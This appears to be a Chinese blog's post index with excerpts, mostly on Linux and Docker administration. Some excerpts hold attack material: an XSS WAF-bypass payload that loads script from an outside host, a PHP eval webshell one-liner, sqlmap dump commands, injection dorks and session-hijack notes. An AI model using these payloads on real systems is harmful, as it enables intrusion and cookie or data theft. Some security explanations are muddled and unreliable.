自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(37)
  • 资源 (10)
  • 问答 (5)
  • 收藏
  • 关注

原创 docker镜像制作流程

https://www.cnblogs.com/iloverain/p/8980275.html

2018-12-30 08:50:36 292

原创 ssh互信 两步搞定

ssh-keygenssh-copy-id -i id_rsa.pub root@10.227.24.242

2018-12-27 14:38:15 143

原创 vitualenv

在开发Python应用程序的时候,系统安装的Python3只有一个版本:3.4。所有第三方的包都会被pip安装到Python3的site-packages目录下。如果我们要同时开发多个应用程序,那这些应用程序都会共用一个Python,就是安装在系统的Python 3。如果应用A需要jinja 2.7,而应用B需要jinja 2.6怎么办?这种情况下,每个应用可能需要各自拥有一套“独立”的P...

2018-12-27 13:55:08 122

转载 配置ssh互信

一、known_hsots ssh会把你每个你访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访问相同计算机时,OpenSSH会核对公钥。如果公钥不同,OpenSSH会发出警告, 避免你受到DNS Hijack之类的攻击。我在上面列出的情况,就是这种情况。原因:一台主机上有多个Linux系统,会经常切换,那么这些系统使用同一ip,登录过一次后就会...

2018-12-27 10:54:25 953

原创 查看某个软件的部署情况

rpm -qa ansible | less /etc/ansible/etc/ansible/ansible.cfg/etc/ansible/hosts/etc/ansible/roles/usr/bin/ansible/usr/bin/ansible-2/usr/bin/ansible-2.7/usr/bin/ansible-config/usr/bin/ansible...

2018-12-27 09:46:22 439

转载 docker centos 7 无法启动

此台机器为香港服务器,为的是方便快速pull公共镜像,之前作为kubernetes集群之一。后因种种原因,此机器退出集群。之后再用到docker时,发现docker启动不了了,查看报错如下:[root@ALY-HKC-PRO-001 ~]# systemctl restart dockerJob for docker.service failed because the control ...

2018-12-26 18:00:39 512

转载 yum源配置 以及docker 安装报错 container-selinux >= 2.9 解决

Error: Package: docker-ce-18.03.1.ce-1.el7.centos.x86_64 (docker-ce-edge)           Requires: container-selinux >= 2.9 You could try using --skip-broken to work around the problem You could try ...

2018-12-26 17:30:27 3829 1

转载 docker部署

前提是先翻墙 最近比较有空,大四出来实习几个月了,作为实习狗的我,被叫去研究Docker了,汗汗!Docker的三大核心概念:镜像、容器、仓库镜像:类似虚拟机的镜像、用俗话说就是安装文件。容器:类似一个轻量级的沙箱,容器是从镜像创建应用运行实例,可以将其启动、开始、停止、删除、而这些容器都是相互隔离、互不可见的。仓库:类似代码仓库,是Docker集中存放镜像文件的场所。...

2018-12-26 15:03:18 123

转载 ftp允许root登陆

 1.编辑/etc/vsftpd/user_list和/etc/vsftpd/ftpusers两个设置文件脚本,将root账户前加上#号变为注释。(即让root账户从禁止登录的用户列表中排除)    2.重新开启vsftpd   service vsftpd reload 允许root账户访问ftp,可以远程访问centos系统中的任一文件,对于远程维护centos系统或下载文件十分方便。...

2018-12-26 09:45:50 5332

转载 python实现遍历目录

1. 基本实现   [root@localhost ~]# cat dirfile.pyimport ospath='/tmp'for dirpath,dirnames,filenames in os.walk(path): for file in filenames: fullpath=os.path.join(dirpath,file) ...

2018-12-26 09:15:06 341

原创 epel源究竟是什么

EPEL (Extra Packages for Enterprise Linux)是基于Fedora的一个项目,为“红帽系”的操作系统提供额外的软件包,适用于RHEL、CentOS和Scientific Linux.使用很简单:1. 首先我们需要安装一个叫”epel-release”的软件包,这个软件包会自动配置yum的软件仓库。当然你也可以不安装这个包,自己配置软件仓库也是一样的。#...

2018-12-24 10:50:00 5567

原创 CentOS 7下YUM 本地仓库的搭建详细步骤

 使用CentOS7.iso 搭建本地仓库(1) 将CentOS7.iso文件拷贝到用户主目录中 即:~? 1 cp CentOS7.iso ~ (2) 创建iso文件将要挂在的目录? 1 mkdir -p /mnt/cdrom (3) 挂在iso文件到刚刚创建的目录中? 1 ...

2018-12-24 10:47:07 1290

原创 sed总结

https://www.cnblogs.com/liwei0526vip/p/5644163.htmlhttps://www.cnblogs.com/ginvip/p/6376049.htmlhttps://wenku.baidu.com/view/f836d988d0d233d4b14e69a7.html 1 sed修改ip地址sed -i '/^ONBOOT=/c\ONBOOT...

2018-12-24 09:40:41 431

原创 js正则表达式

RegExp两种创建方式    (1)直接量    (2)new RegExp();个人推荐用直接量var reg=/abc/; 用反斜杠夹住var str="abcd\"edf";var reg=/abc/;reg.test(str); 返回true   检测str中是否有reg所限定的字符或者var str="abcd\"edf";var reg=/abc/...

2018-12-24 09:38:27 104

转载 破解无线密码

http://topspeedsnail.com/kali-linux-crack-wifi-wpa/

2018-12-23 20:13:30 273

原创 xss脚本绕过waf

<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0ZweWpnUz8nK01hdGgucmFuZG9tKCk='))> atob解密后是真正的js代码...

2018-12-22 18:33:55 990

原创 html转义字符

先看转义字符百科https://baike.baidu.com/item/%E8%BD%AC%E4%B9%89%E5%AD%97%E7%AC%A6/86397?fr=aladdin然后看html转义字符对照表http://tool.oschina.net/commons?type=2

2018-12-22 14:04:46 2713

原创 原来html的转义字符只能显示不能作为代码执行

<!DOCTYPE html><html><head>    <title></title></head><body>&#60&#115&#99&#114&#105&#112&#116&amp

2018-12-22 14:03:38 1444

原创 apache配置限制后台登陆的地址为某个地址

<Directory "E:/phpstudy/PHPTutorial/WWW/abc">    #你想限制访问的后台目录Order deny,allowallow from 172.29.120.48   #只允许这个IP访问***后台目录,多个IP用空格隔开deny from all</Directory> ...

2018-12-21 09:21:24 980 1

原创 php crsf 攻击代码

https://www.cnblogs.com/yangtoude/p/php-web-csrf.html

2018-12-20 09:08:17 322

原创 csrf和xss的区别

csrf是不获取用户的cookie的,而xss是获取用户cookie的,从这一点,csrf更容易入侵。csrf是让用户自己访问黑客发送的链接

2018-12-20 08:55:08 1262 2

原创 伪造session

例如A用户登陆了一个网站http://www.****.net/public/index/user/index_logined他的session id再cookie文件里保存  PHPSESSID=8ij3rq9ts56rb51d3859a3jeq6 然后B用户通过csrf截获了PHPSESSID=8ij3rq9ts56rb51d3859a3jeq6这个cookie然后在浏览器...

2018-12-19 15:45:23 4486

原创 xss转码

https://www.toolmao.com/xsstranser

2018-12-18 15:30:19 1064

原创 转义字符的理解

转义字符是根据语境来的在百度百科里有这个 但是实际上用js语言输出的时候document.write("'")可以打印出'document.write("\'")也可以打印出',因为这种情况下'没有歧义但是如果document.write(''')会报错但是如果document.write('\'')既可以打印出'这充分说明\的作用要根据语境 另外有些空格在...

2018-12-18 14:06:51 401

原创 百度和谷歌获取注入点

在百度输入inurl:index.php?id=1谷歌输入filetype:index.php?id=1谷歌对某个站点进行注入搜索Site:www.somesite.com filetype:asp

2018-12-18 11:58:17 772

原创 基于get的xss注入

abc.php<?php$servername = "localhost";$username = "root";$password = "root";$dbname = "test"; // 创建连接$conn = new mysqli($servername, $username, $password, $dbname);// 检测连接if ($conn->...

2018-12-17 19:43:48 752

原创 sqlmap爆破post数据

把burpsuite截获的数据包存放到sqlmap本地目录中python sqlmap.py -r "abc.txt" --batch --dump-all --dump-all 爆破所有 

2018-12-17 14:01:19 1431

原创 使用FireFox插件RESTClient工具POST方法?

贴出php代码<html><body><?php$con = mysql_connect("localhost","root","root");if (!$con)  {  die('Could not connect: ' . mysql_error());  }else{   mysql_select_db("test");  

2018-12-17 10:33:32 612

原创 php一句话获取webshell代码

<?php @eval($_POST['chopper']);?>

2018-12-14 18:07:18 3392

原创 xss跨站脚本攻击

获取了cookie之后,比如用户名密码,一般就可以直接放到浏览器的输入,输出框进行登陆了。

2018-12-14 11:54:44 133

原创 mod header中的cookie注入如何加and1=2

添加cookie头字段,值设置为id=171+and+(1=2)+union+select+1,2,3,4,5,6,7,8,9,10+from+admin  

2018-12-12 17:27:07 1224

原创 有关access数据库sql注入的问题

设计一个access 数据库如下 如果用这个语句SELECT *FROM 表1 where id=1 union select 1,2,3;会报错 如果改成这样SELECT *FROM 表1 where id=1 union select 1,2,3 from 表1;则没问题而且结果如下发现 1,2,3是放在前面的再改成这样SELECT *FRO...

2018-12-12 17:09:35 523

原创 http协议

HTTP简介HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系...

2018-12-12 12:03:15 174

原创 空格在urlcode中的问题

1 浏览器自动编码在浏览器输入 http://localhost/urldecode.php?a=1&b=2 1浏览器自动转换为http://localhost/urldecode.php?a=1&b=2%201无论在urldecode.php解码也好不解码也好,都是显示空格不会显示%20 <?phpecho 'a:'.$_GET['a'];ec...

2018-12-11 14:07:54 436

原创 js和php的url编码

写一个urlcode.html的文件如下<!DOCTYPE html><html><head>    <title></title></head><body><script type="text/javascript">    var url2=

2018-12-11 09:18:27 698

原创 mysql 使用存储过程定期插入一定的数据

delimiter $$create procedure insertyonghu2()begindeclare i varchar(20);declare j varchar(20);declare x int;set x=50;set i = 'li';set j='xiaotong';while x <70 doinsert into yonghu(password...

2018-12-09 08:56:46 304

原创 mysql 存储过程

新建查询delimiter $$create procedure show_user()beginselect * from user;end$$delimiter ; 新建查询call show_user();

2018-12-08 13:15:29 71

stm32定时器学号串口发送.zip

stm32定时器学号串口发送.zip

2021-07-02

九优seo综合版v3.6(百度360排名点击,网站文章后台自动更新)

九优SEO优化软件本是针对搜索引擎的SEO优化类软件,2017年4月正式上线。软件可像真人点击一样,自动点击百度、360等搜索引擎内的网址进行优化,点击逼真,效果好。官网网址www.wangqunseo.com 由于该软件经常被误报为木马,所以请退出360安全卫士,再运

2018-03-05

bochs2.4.6

包含工具本身,还有bochsrc的设置,以及pm.img

2011-10-15

Intel 汇编语言程序设计第五版源码

Intel汇编语言程序设计的资料 源码 学习汇编,我爱汇编

2011-08-21

基于stm32TFT液晶屏显示源码分析

基于stm32 的液晶屏驱动 中文显示 英文显示

2011-03-25

CAN总线呕心沥血教程

鄙人关于CAN总线的总结。搜集了很多资料

2011-03-25

stm32 火牛开发板按键中断驱动

stm32 火牛开发板 按键中断驱动实验例程,呵呵

2011-03-12

stm32 火牛开发板 按键驱动

stm32 火牛开发板 按键驱动实验例程,呵呵

2011-03-12

stm32 中断解析

关于stm32的中断方面的解析,学到中断的相关信息

2011-03-12

stm32 时钟解析

关于stm32的时钟原理解析,自己根据书籍总结的

2011-03-12

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除